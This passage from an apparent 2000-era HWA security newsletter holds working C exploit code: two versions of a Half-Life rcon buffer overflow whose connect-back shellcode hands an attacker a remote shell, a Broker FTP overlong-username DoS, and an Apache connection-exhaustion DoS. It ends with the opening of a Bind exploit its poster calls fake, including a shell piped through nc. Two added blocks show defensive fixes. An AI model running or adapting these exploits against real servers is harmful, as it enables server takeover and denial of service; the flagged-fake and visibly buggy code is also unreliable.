         printf("\t   remote_OS  [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown")));
         if (str[1]=='w') return 2;
         if (str[1]=='l') return 1;
         return 0;
      }
      
      u32 retrieve_local_info(int sock, u8 *host)
      {
         struct sockaddr_in server;
         int    soclen;
         soclen = sizeof(server);
         if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
             {
             printf("*  error in getsockname\n");
             exit(0);
             }
         snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port));
         return htonl(server.sin_addr.s_addr);
      }
      
      int 
      bind_tcp( int *port)
      {
         struct sockaddr_in mask_addr;
         int sock, portno=25000; /* base_port */
      
         sock = socket( AF_INET, SOCK_STREAM, 0);
         if (sock<0)
            return sock;
      
      redo:
         mask_addr.sin_family = AF_INET;
         mask_addr.sin_port = htons( portno);
         mask_addr.sin_addr.s_addr = 0;
      
         if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
            {
      error:
            portno++;
            if (portno>26000)
               {
               printf("*  no TCP port to bind in.\n");
               exit(0);
               }
            goto redo;
            }
         if (listen( sock, 0)<0)
            goto error;
      
         printf(".  TCP listen port number %d\n", portno);
         *port = portno;
         return sock;
      }
      
      wait_for_connect(int sock)
      {
         fd_set fds;
         u8     tmp[256];
         int    tcp, addr_len;
         struct sockaddr_in server;
      
         printf(".  waiting for connect_back shellcode response...  ");
         if (async_read(sock, 40)!=sock)
              {
              printf("\bfailed!\r*\n");
              exit(0);
              }
          tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
          printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
          close(sock); /* closing incoming socket */
          printf(".  congratulations. you have owned this one.\n");
          
          sprintf(tmp,"uname -a; id\n");
          send(tcp, tmp, strlen(tmp), 0);
          /* basic async mode */
          while (1)
              {
              FD_ZERO(&fds);
              FD_SET(0, &fds);
              FD_SET(tcp, &fds);
             
              if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
                 {
                 if (FD_ISSET(0, &fds))
                    {
                    int n;
                    n = read(0, tmp, 256);
                    if (n<0)
                       goto end_conn;
                    if (write(tcp, tmp, n)!=n) goto end_conn;
                    }
                 if (FD_ISSET(tcp, &fds))
                    {
                    int n;
                    n = read(tcp, tmp, 256);
                    if (n<0)
                       goto end_conn;
      
                    if (write(0, tmp, n)!=n) goto end_conn;
                    }
                 }
              }
      end_conn:
          close(tcp);
          printf(".  bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n");  
      }
      
      assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo)
      {
         u8    pkt[2048], 
               *shell_ptr;
         struct sockaddr_in *sc_server;
         u32   ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40;
         int   i, n, tcp, tcp_port;
      
         printf(".  localinfo %s\n", linfo);
         tcp = bind_tcp( &tcp_port);
         sc_server = (struct sockaddr_in *)&shellcode[10];
         sc_server->sin_addr.s_addr = htonl(laddr);
         sc_server->sin_port = htons(tcp_port);
      
         last_byte-=strlen(linfo);
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf( &pkt[4], "rcon ");
         i = strlen(pkt);
         shell_ptr = &pkt[i];
      
         /* find out how many nops we can push before shellcode */
         n = last_byte - i - sizeof(shellcode)-1 - over_head;
         for (i=0;i<n;i++)
             shell_ptr[i] = 0x90; /* nop */
         shell_ptr+=i;
      
         /* fill in the shellcode */
         for (i=0;i<sizeof(shellcode)-1;i++)
             shell_ptr[i] = shellcode[i];
         shell_ptr+=i;
      
         /* fill in the overhead buffer */
         for (i=0;i<over_head;i++)
             shell_ptr[i] = '-';
         shell_ptr+=i;
      
         /* fill return address and ebp */
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
      
         /* finalize string */
         *shell_ptr = 0;
      
         n = udp_send( sock, addr, port, pkt, strlen(pkt));
         printf(".  sending poison code. %d bytes sent\n",n);
         wait_for_connect(tcp);
      }
      
      usage()
      {
          exit(0);
      }
      
      main(int argc, char **argv)
      {
         u32 addr, laddr;
         u16 port;
      
         int sock, i;
         u8  linfo[256], *tmp = NULL;
      
         printf(".  half-life 3.1.0.x remote buffer-overflow for linux x86\n");
         printf(".  (c)2000 Tamandua Sekure Laboratories\n");
         printf(".  (c)2000 Thiago Zaninotti & Gustavo Scotti\n");
      
         if (argc<2)
            usage();
      
         tmp = (u8 *)strchr(argv[1], ':');
         if (tmp)
            {
            *tmp = 0; tmp++;
            port = atoi(tmp);
            }
         else
            {
            printf(":  port not found, using default 27015\n");
            port = 27015;
            }
      
         addr = dns2ip(argv[1]);
      
         if (addr==0xffffffff)
            {
            printf("*  host not found!\n");
            exit(0);
            }
      
         sock = udp_connect( addr, port);
         laddr = retrieve_local_info(sock, linfo);
         if (get_server_info(sock, addr, port)!=1)
            {
            printf("*  this is not a linux server. no shellcode available!\n");
            exit(0);
            }
         assembly_shell_code(sock, addr, port, laddr, linfo); 
         
      }
      
      /* -==- END HWA PoC CODE RELEASE -==- */
      
      
      New release with comments/advisory.
      
      /*
       *  SDI HalfLife rcon remote exploit for linux x86
       *  (portuguese) exploit remoto para o buffer overflow do rcon no halflife
       *
       *  Tamandua Sekure Labs (Sao Paulo - Porto Alegre, Brazil)
       *  by Thiago Zaninotti (c0nd0r) <condor@sekure.org>
       *     Gustavo Scotti   (csh)    <csh@sekure.org>
       *
       *  Proof of concept - There is a remote exploitable buffer overflow
       *  in Half Life server (3.1.0.x) for linux (HLDS). The problem is
       *  related to the RCON command (Remote CONsole).
       *  (port.) Existe um buffer overflow exploitavel no Half Life Server
       *  (HLDS) relacionado ao comando RCON.
       *
       *  After several tests, we found out the 'rcon' command is also vulnerable
       *  to a format string attack which can lead to a remote exploitation.
       *  (port) O comando RCON tambem e' vulneravel a um format string attack.
       *
       *  YOU DO NOT NEED THE RCON PASSWORD TO EXPLOIT THIS VULNERABILITY,
       *  which means any multiplayer server is vulnerable to the attack.
       *  (port) Voce nao precisa de password para explorar esta vulnerabilidade,
       *    o que significa que qualquer servidor e' vulneravel.
       *
       *  Acknowledgements: Tamandua Sekure Labs - Fabio Ramos (framos@axur.org),
       *  Eduardo Freitas, Marcos Sposito, Roberto Monteiro (casper),
       *  Nelson Britto (stderr), Sabrina Monteiro, Gabriel Zaninotti and
       *  Felipe Salum. To all the readers of Best of Security Brasil (BOS-BR).
       *
       *  Respects: c_orb, el8.org (specially duke), meta, guys at core sdi,
       *  the "infame" TOXYN.ORG (pt rocks) - r00t, pr0m, horizon, plaguez,
       *  ratao and p.ulh.as/promisc.net crew. Greetz to AXUR.ORG too! guys at
       *  sekure.org: vader, jamez, falcon and staff.
       *
       *  WE DO NOT TAKE ANY RESPONSIBILITY. DO NOT USE THIS CODE TO GAIN
       *  UNAUTHORIZED ACCESS TO A REMOTE SERVER -- THIS IS NOT LEGAL.
       *
       *  also thanks to botman (botman@mailandnews.com) and pudim.
       *  Visit the brazilian security portal: http://www.securenet.com.br
       */
      
      #include <stdlib.h>
      #include <stdio.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/time.h>
      #include <netdb.h>
      
      typedef unsigned long   u32;
      typedef unsigned short  u16;
      typedef unsigned char   u8;
      
      unsigned char shellcode[]=
      "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff scotti@axur.org"
      "\x2f\x62\x69\x6e\x2f"
      "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08"
      "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89"
      "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
      "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46"
      "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43"
      "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89"
      "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd"
      "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0"
      "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b"
      "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40"
      "\xcd\x80";
      
      
      /* NET functions */
      int
      udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              int i,n;
              i = sizeof(server);
              n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i);
              *daddr = ntohl(server.sin_addr.s_addr);
              *port = ntohs(server.sin_port);
              return n;
      }
      
      int
      udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              server.sin_family = AF_INET;
              server.sin_port = htons( port);
              server.sin_addr.s_addr = htonl( daddr);
              return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server));
      }
      
      int
      udp_connect( u32 addr, u16 port)
      {
              struct sockaddr_in client;
              int new_fd;
      
              new_fd = socket( AF_INET, SOCK_DGRAM, 0);
              if (new_fd<0)
                 return new_fd;
      
              bzero( (char *) &client, sizeof( client));
              client.sin_family = AF_INET;
              client.sin_addr.s_addr = htonl( addr);
              client.sin_port = htons( port);
              if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0)
                 return -1; /* cant bind local address */
      
              return new_fd;
      }
      
      
      u32 dns2ip( u8 *host)
      {
              struct hostent *dns;
              u32     saddr;
              dns = gethostbyname( host);
              if (!dns)
                 return 0xffffffff;
              bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
              return ntohl(saddr);
      }
      
      
      int
      async_read( int sock_r, int rettime)
      {
         fd_set           fd_r;
         struct timeval   tv;
         char             try_ch[4]="/-\\|";
      
         int r,j;
      
         for (r=0;r<rettime;r++)
             {
             for (j=0;j<20;)
                 {
                 int i;
      
                 printf("\b%c", try_ch[(j%4)]);
                 fflush(stdout);
      
                 FD_ZERO( &fd_r);
                 FD_SET( sock_r, &fd_r);
      
                 tv.tv_sec  = 0;
                 tv.tv_usec = 50000;
      
      
                 i =select( sock_r + 1, &fd_r, NULL, NULL, &tv);
                 if (!i) { j++; continue; }
                 if (i>0)
                    if (FD_ISSET(sock_r, &fd_r)) return sock_r;
                 else
                    return -1;
                 }
             }
         return -1;
      }
      
      
      int
      get_server_info( int sock, u32 addr, u16 port)
      {
         u32 r_addr;
         u16 r_port;
         int n, i;
         u8  pkt[256], *str;
      
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf(&pkt[4], "details");
      
         n = udp_send(sock, addr, port, pkt, strlen(pkt));
         printf(".  connecting to the server...  "); fflush(stdout);
         if (async_read(sock, 6)<0)
             goto server_down;
         n = udp_read(sock, &addr, &port, pkt, sizeof(pkt));
         if (n<0)
              {
      server_down:
              printf("\bserver down!\r*\n");
              exit(0);
              }
         printf("\bdone\n");
         str = &pkt[4];
         str+=strlen(str)+1;
         printf("\t server_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\t    map_name  [%s]\n", str); str+=strlen(str)+1;
         str+=strlen(str)+1;
      
         printf("\t   game_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\tusers_online  [%d of %d]\n", str[0], str[1]); str+=3;
         printf("\t   remote_OS  [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown")));
         if (str[1]=='w') return 2;
         if (str[1]=='l') return 1;
         return 0;
      }
      
      u32 retrieve_local_info(int sock, u8 *host)
      {
         struct sockaddr_in server;
         int    soclen;
         soclen = sizeof(server);
         if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
             {
             printf("error in getsockname\n");
             exit(0);
             }
         snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port));
         return htonl(server.sin_addr.s_addr);
      }
      
      int
      bind_tcp( int *port)
      {
         struct sockaddr_in mask_addr;
         int sock, portno=25000; /* base_port */
      
         sock = socket( AF_INET, SOCK_STREAM, 0);
         if (sock<0)
            return sock;
      
      redo:
         mask_addr.sin_family = AF_INET;
         mask_addr.sin_port = htons( portno);
         mask_addr.sin_addr.s_addr = 0;
      
         if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
            {
      error:
            portno++;
            if (portno>26000)
               {
               printf("*  no TCP port to bind in.\n");
               exit(0);
               }
            goto redo;
            }
         if (listen( sock, 0)<0)
            goto error;
      
         printf(".  TCP listen port number %d\n", portno);
         *port = portno;
         return sock;
      }
      
      wait_for_connect(int sock)
      {
         fd_set fds;
         u8     tmp[256];
         int    tcp, addr_len;
         struct sockaddr_in server;
      
         printf(".  waiting for connect_back shellcode responde...  ");
         if (async_read(sock, 15)!=sock)
              {
              printf("\bfailed!\r*\n");
              exit(0);
              }
          tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
          printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
          close(sock); /* closing incoming socket */
          printf(".  congratulations. you have owned this one.\n");
      
      
          /* basic async mode */
          while (1)
              {
              FD_ZERO(&fds);
              FD_SET(0, &fds);
              FD_SET(tcp, &fds);
      
              if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
                 {
                 if (FD_ISSET(0, &fds))
                    {
                    int n;
                    n = read(0, tmp, 256);
                    if (n<0)
                       goto end_conn;
                    if (write(tcp, tmp, n)!=n) goto end_conn;
                    }
                 if (FD_ISSET(tcp, &fds))
                    {
                    int n;
                    n = read(tcp, tmp, 256);
                    if (n<0)
                       goto end_conn;
      
                    if (write(0, tmp, n)!=n) goto end_conn;
                    }
                 }
              }
      end_conn:
          close(tcp);
          printf(".  bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n");
      }
      
      assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo)
      {
         u8    pkt[2048],
               *shell_ptr;
         struct sockaddr_in *sc_server;
         u32   ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40;
         int   i, n, tcp, tcp_port;
      
         printf(".  localinfo %s\n", linfo);
         tcp = bind_tcp( &tcp_port);
         sc_server = (struct sockaddr_in *)&shellcode[10];
         sc_server->sin_addr.s_addr = htonl(laddr);
         sc_server->sin_port = htons(tcp_port);
      
         last_byte-=strlen(linfo);
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf( &pkt[4], "rcon ");
         i = strlen(pkt);
         shell_ptr = &pkt[i];
      
         /* find out how many nops we can push before shellcode */
         n = last_byte - i - sizeof(shellcode)-1 - over_head;
         for (i=0;i<n;i++)
             shell_ptr[i] = 0x90; /* nop */
         shell_ptr+=i;
      
         /* fill in the shellcode */
         for (i=0;i<sizeof(shellcode)-1;i++)
             shell_ptr[i] = shellcode[i];
         shell_ptr+=i;
      
         /* fill in the overhead buffer */
         for (i=0;i<over_head;i++)
             shell_ptr[i] = '-';
         shell_ptr+=i;
      
         /* fill return address and ebp */
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
      
         /* finalize string */
         *shell_ptr = 0;
      
         n = udp_send( sock, addr, port, pkt, strlen(pkt));
         printf(".  sending poison code. %d bytes sent\n",n);
         wait_for_connect(tcp);
      }
      
      usage()
      {
         printf("\n.  usage: hl-rcon <server ip[:port]>\n");
         exit(-1);
      }
      
      main(int argc, char **argv)
      {
         u32 addr, laddr;
         u16 port;
      
         int sock, i;
         u8  linfo[256], *tmp = NULL;
      
         printf(".  half-life 3.1.0.x remote buffer-overflow for linux x86\n");
         printf(".  (c)2000, Tamandua Sekure Laboratories\n");
         printf(".  Authors: Thiago Zaninotti & Gustavo Scotti\n");
      
         if (argc<2)
            usage();
      
         tmp = (u8 *)strchr(argv[1], ':');
         if (tmp)
            {
            *tmp = 0; tmp++;
            port = atoi(tmp);
            }
         else
            {
            printf(":  port not found, using default 27015\n");
            port = 27015;
            }
      
         addr = dns2ip(argv[1]);
      
         if (addr==0xffffffff)
            {
            printf("host not found!\n");
            exit(0);
            }
      
         sock = udp_connect( addr, port);
         laddr = retrieve_local_info(sock, linfo);
         if (get_server_info(sock, addr, port)!=1)
            {
            printf("this is not a linux server. Make a shellcode to it and have fun\n");
            exit(0);
            }
         assembly_shell_code(sock, addr, port, laddr, linfo);
      
      }
      
      
      @HWA      
      
      
333.0 [HWA] Release: trans0ft brokerftp vuln by eth0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more; also check
      http://hwa-security.net/hot.html for new releases.
            
      
      
      
      /**************************************************/
      /*This proof-of-concept DoS was programmed in less*/
      /*than 5 minutes (I was bored), and was programmed*/
      /*from the information taken from USSR Labs white */
      /*paper on TransSoft's Broker FTP Server          */
      /*                                                */
      /*                               eth0 of hwa      */
      /*                    [eth0@hwa-security.net]     */
      /*                    [http://www.hwa-security.net*/
      /**************************************************/
      
      #include <stdio.h>
      #include <strings.h>
      #include <errno.h>
      #include <signal.h>
      #include <sys/syscall.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      
      struct in_addr
      resolv (char *name)
      {
        static struct in_addr in;
        unsigned long l;
        struct hostent *ent;
      
        if ((l = inet_addr (name)) != INADDR_NONE)
          {
            in.s_addr = l;
            return in;
          }
        if (!(ent = gethostbyname (name)))
          {
            in.s_addr = INADDR_NONE;
            return in;
          }
        return *(struct in_addr *) ent->h_addr;
      }
      
      
      main (int argc, char *argv[])
      {
        struct sockaddr_in addr;
        int i, s;
        char c;
        int port = 21;
        printf("Vulnerable systems:    eth0 from HWA
       Broker FTP Server version 3.x
       Broker FTP Server version 4.x
       Immune systems:
       Broker FTP Server version 4.3.0.1 \n");
       
        if (argc < 2)
          {
            printf ("Usage : %s <host> [port]\n", argv[0]);
            exit (0);
          }
        if (argc == 3)
          port = atoi (argv[2]);
        s = socket (AF_INET, SOCK_STREAM, 0);
        addr.sin_family = AF_INET;
        addr.sin_addr = resolv (argv[1]);
        addr.sin_port = htons (port);
        connect (s, (struct sockaddr *) &addr, sizeof (addr));
        write (s, "USER ", 5);
        for (i = 1; i <= 6002; i++)
          {
            write (s, "x", 1);
          }
        write (s, "\n", 1);
      
        read (s, &c, 1);
        printf("Done sending 6002 characters as the username...\n");
      
      }
      
      @HWA            
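
      The request this PoC sends is one command line carrying a 6002-byte
      USER argument. A server-side parser that survives it, as an added
      example (not TransSoft's code and not part of eth0's release); the
      512-byte line cap, the 64-byte argument cap and all names here are
      assumptions:

```c
#include <stdio.h>
#include <string.h>

#define FTP_MAX_LINE 512   /* assumed cap on one command line, CRLF included */
#define FTP_MAX_ARG   64   /* assumed cap on the argument (e.g. a user name) */

enum ftp_parse {
    FTP_OK, FTP_INCOMPLETE, FTP_LINE_TOO_LONG, FTP_ARG_TOO_LONG, FTP_BAD_SYNTAX
};

struct ftp_cmd {
    char verb[5];                  /* 3 or 4 letters plus NUL */
    char arg[FTP_MAX_ARG + 1];
};

/* Parse one command line out of a receive buffer. Every copy is preceded by
 * a length check against the destination; *consumed is set only on FTP_OK. */
enum ftp_parse ftp_parse_line(const unsigned char *in, size_t in_len,
                              struct ftp_cmd *out, size_t *consumed)
{
    size_t scan = in_len < FTP_MAX_LINE ? in_len : FTP_MAX_LINE;
    const unsigned char *nl = memchr(in, '\n', scan);
    size_t len, v, a, i;

    /* No newline inside the cap: either wait for more data or give up. */
    if (nl == NULL)
        return in_len >= FTP_MAX_LINE ? FTP_LINE_TOO_LONG : FTP_INCOMPLETE;

    len = (size_t)(nl - in);
    if (len > 0 && in[len - 1] == '\r')
        len--;                                 /* accept CRLF and bare LF */

    /* Verb: 3 or 4 ASCII letters, stored upper-case. */
    for (v = 0; v < len && v < 4; v++) {
        unsigned char c = in[v];
        if (c >= 'a' && c <= 'z')
            c = (unsigned char)(c - 'a' + 'A');
        if (c < 'A' || c > 'Z')
            break;
        out->verb[v] = (char)c;
    }
    if (v < 3)
        return FTP_BAD_SYNTAX;
    out->verb[v] = '\0';

    if (v == len) {
        out->arg[0] = '\0';                    /* command without argument */
    } else {
        if (in[v] != ' ')
            return FTP_BAD_SYNTAX;
        a = len - (v + 1);
        if (a > FTP_MAX_ARG)
            return FTP_ARG_TOO_LONG;           /* checked before any copy */
        for (i = 0; i < a; i++) {
            unsigned char c = in[v + 1 + i];
            if (c < 0x20 || c == 0x7f)
                return FTP_BAD_SYNTAX;         /* no control bytes in names */
            out->arg[i] = (char)c;
        }
        out->arg[a] = '\0';
    }
    *consumed = (size_t)(nl - in) + 1;
    return FTP_OK;
}

/* Reply to send before dropping the line (or the connection). */
const char *ftp_reply_for(enum ftp_parse r)
{
    switch (r) {
    case FTP_LINE_TOO_LONG: return "500 Command line too long.\r\n";
    case FTP_ARG_TOO_LONG:  return "501 Argument too long.\r\n";
    case FTP_BAD_SYNTAX:    return "500 Syntax error.\r\n";
    default:                return NULL;
    }
}

/* Constructed input: "USER " + n bytes of 'x' + newline, the shape of the
 * request above when n = 6002. Returns the parser's verdict. */
enum ftp_parse demo_user_of_length(size_t n)
{
    static unsigned char buf[8192];
    struct ftp_cmd cmd;
    size_t used = 0;

    if (n > sizeof buf - 6)
        return FTP_BAD_SYNTAX;
    memcpy(buf, "USER ", 5);
    memset(buf + 5, 'x', n);
    buf[5 + n] = '\n';
    return ftp_parse_line(buf, n + 6, &cmd, &used);
}

/* Parse a NUL-terminated sample; return its argument or NULL if rejected. */
const char *demo_arg(const char *line)
{
    static struct ftp_cmd cmd;
    size_t used = 0;

    if (ftp_parse_line((const unsigned char *)line, strlen(line),
                       &cmd, &used) != FTP_OK)
        return NULL;
    return cmd.arg;
}

int main(void)
{
    printf("6002-byte USER -> %s", ftp_reply_for(demo_user_of_length(6002)));
    printf("100-byte USER  -> %s", ftp_reply_for(demo_user_of_length(100)));
    printf("anonymous      -> arg \"%s\"\n", demo_arg("USER anonymous\r\n"));
    return 0;
}
```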

334.0 [HWA] Release: Grazer releases R2D2 dos
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /* ------------------- R2D2.c ------------------ */
      /*  DIGIT-LABS PRIVATE!!!! DO NOT DISTRIBUTE!!!  */
      /*  Released thru HWA-Security.net by GRAZER     */
      /*                 Oct 21 2000                   */
      /*  grazer@hwa-security.net                      */
      /* ------------------- R2D2.c ------------------ */
      /* This tool will open a lot of connections (TCP)
      *  to the target and port you specify.
      *
      * I have configured it to DoS some of the
      * Apache webservers. There is a little issue in
      * httpd.conf, the MaxClients default value is
      * 150 (RedHat 6.0 / Apache1.3.6), easy to fill up.
      *
      * I have built-in some scriptkiddie protection to 
      * avoid some stupid people will mess with this tool.
      *
      * Thanks to Scrippie for some good ideas and help.
      * Thank to Mixter for help and addition.
      *
      *                    grazer@digit-labs.org
      *                 // grazer@hwa-security.net
      *
      * http://www.digit-labs.org || http://hwa-security.net
      */
      
      
      #include<stdio.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      #include<netdb.h>
      
      char server_lag[] = "GET ////////////////////////////////////////////
      HTTP/1.0\n";
      
      main(int argc, char *argv[])
      {
      
      int MaxClients;
      int Timeout = 15;
      int times_to_connect;
      int sock, i, x, s[MaxClients], port;
      
      struct in_addr addr;
      struct sockaddr_in sin;
      struct hostent *he; 
      
      if (argc<3)
         {
         printf("\nR2D2 Apache Default MaxClients DoS \n");
         printf("usage : %s <victim> <port> <Times>\n",argv[0]);
         printf("Times = Times to reconnect after Timeout \n");
         printf("                         by grazer       \n");   
         exit(0);
           }
      
      times_to_connect = atoi(argv[1]);
      port = atoi(argv[2]);
      
      if ((he=gethostbyname(argv[1])) == NULL)
         {
         printf ("Cannot Lookup Host");
         exit(0);
         }
           
         bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
         sin.sin_family=AF_INET;
         sin.sin_port=htons(port);
           
         MaxClients = 150; /* make this the victims httpd.conf MaxClient 
                              value */                       
      
      for (x=0; x < times_to_connect; x++)
      {
         for (i=0;i<MaxClients;i++)
         {
           s[MaxClients] = socket(AF_INET, SOCK_STREAM, 0);
           sock = connect(s[MaxClients], (struct sockaddr*)&sin, sizeof(sin));
         /*  write(s[MaxClients], server_lag, strlen(server_lag));            */ 
         /* Remove comment pare and set timeout to 1 to enable server-lagging */
         } 
      
      sleep(Timeout);
      }
      }
      
      @HWA      
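
      The comment above relies on one source being allowed to hold every
      one of the 150 MaxClients slots. Per-source admission accounting for
      an accept loop or front end closes that gap; this is an added example
      (not Apache's code and not part of grazer's release), and the limit
      of 10 per source, the table layout and all names are assumptions:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_CLIENTS    150   /* worker slots: the default the comment cites */
#define MAX_PER_SOURCE  10   /* assumed policy value; raise for proxies/NAT */

enum admit { ADMIT_OK, DENY_PER_SOURCE, DENY_SERVER_FULL };

struct src_entry  { uint32_t ip; unsigned count; };  /* count == 0: free */
struct conn_table { struct src_entry e[MAX_CLIENTS]; unsigned total; };

/* Find the live entry for ip; optionally report the first free slot. */
static struct src_entry *find(struct conn_table *t, uint32_t ip,
                              struct src_entry **free_slot)
{
    struct src_entry *hit = NULL;
    size_t i;

    if (free_slot)
        *free_slot = NULL;
    for (i = 0; i < MAX_CLIENTS; i++) {
        struct src_entry *s = &t->e[i];
        if (s->count > 0 && s->ip == ip)
            hit = s;
        else if (s->count == 0 && free_slot && *free_slot == NULL)
            *free_slot = s;
    }
    return hit;
}

/* Call on accept(): decide whether this source may take another slot. */
enum admit conn_admit(struct conn_table *t, uint32_t ip)
{
    struct src_entry *free_slot;
    struct src_entry *hit = find(t, ip, &free_slot);

    if (hit && hit->count >= MAX_PER_SOURCE)
        return DENY_PER_SOURCE;
    if (t->total >= MAX_CLIENTS)
        return DENY_SERVER_FULL;
    if (!hit) {
        /* total < MAX_CLIENTS guarantees at least one free entry */
        hit = free_slot;
        hit->ip = ip;
    }
    hit->count++;
    t->total++;
    return ADMIT_OK;
}

/* Call on close(): give the slot back. */
void conn_release(struct conn_table *t, uint32_t ip)
{
    struct src_entry *hit = find(t, ip, NULL);

    if (hit) {
        hit->count--;
        t->total--;
    }
}

struct demo_result {
    unsigned   flood_admitted;       /* of MAX_CLIENTS attempts, one source */
    unsigned   slots_left;
    enum admit visitor;              /* a different source, afterwards */
    enum admit flooder_again;
    enum admit flooder_after_close;
};

/* Constructed scenario: one source tries to open MAX_CLIENTS connections. */
struct demo_result demo_scenario(void)
{
    const uint32_t flooder = 0xC000020Au;   /* 192.0.2.10, constructed */
    const uint32_t visitor = 0xC6336407u;   /* 198.51.100.7, constructed */
    struct conn_table t;
    struct demo_result r;
    int i;

    memset(&t, 0, sizeof t);
    memset(&r, 0, sizeof r);
    for (i = 0; i < MAX_CLIENTS; i++)
        if (conn_admit(&t, flooder) == ADMIT_OK)
            r.flood_admitted++;
    r.slots_left = MAX_CLIENTS - t.total;
    r.visitor = conn_admit(&t, visitor);
    r.flooder_again = conn_admit(&t, flooder);
    conn_release(&t, flooder);
    r.flooder_after_close = conn_admit(&t, flooder);
    return r;
}

int main(void)
{
    struct demo_result r = demo_scenario();

    printf("admitted from one source: %u of %d attempts\n",
           r.flood_admitted, MAX_CLIENTS);
    printf("slots still free: %u, other client admitted: %s\n",
           r.slots_left, r.visitor == ADMIT_OK ? "yes" : "no");
    return 0;
}
```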

335.0 [HWA] The Bind P3 exploit revealed.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      For what it is. A phake
      
      THIS DOES NOT WORK IT DOES SHIT, ITS BROKEN AND IS FAKE
      
       /* start fux0ring script kids in 2000                   */
       /* Bogosities: SUSPECTED bogus Bind P3 Sept 2000        */ 
       /* some twit sent me this and a friend blabbed that     */  
       /* i had it so now everyone was bugging me for it i'm   */
       /*  pretty damn sure it is a bogus/rip/fake shellcode   */
       /* and a call to netcat? c'mon. bur grab it and stfu.   */
      
       /* DON'T ask us anything about it i won't respond. 
       /* 
       /* Confirmed hoax/fake code.

       
       /* Posted on HWA-Security.net for above reasons    */
       /* Code is PHAKE                                   */
      
       PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE
       
                  >>> ADM Bind 8.2.2-P3 <<<
      
           ripped/fucked for fbsd
        
           IRCnet
       
                #elitehackerz
       
                          fucks to #!ADM
       
        remote bind 8.2.2 pre3 
        ported to FreeBSD by gunt3r 
      
                  >>> ADM Bind Rip 8.2.2-P3 <<<
      
        PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE
        greets to ADM, stran9er, holg3r
      
        bug in: bind/named/ns_req.c:req_inquery()
      */
      /*
        offsets: 8.0.0     min =  0           options fake-iquery
                 8.2.2-P3  min = -100
                 8.1.1     min =  400         [ fake-iquery yes; ]
      */
      /*
       Usage example:
        $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53                                                                             
        Adress: 0xefbfd444 Offset: 0                                                    
        sh: can't access tty; job control turned off                                    
        # whoami
        root
        #
      */
      #define QUERY_LEN 0x600
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <sys/types.h>
      #include <netinet/in.h>
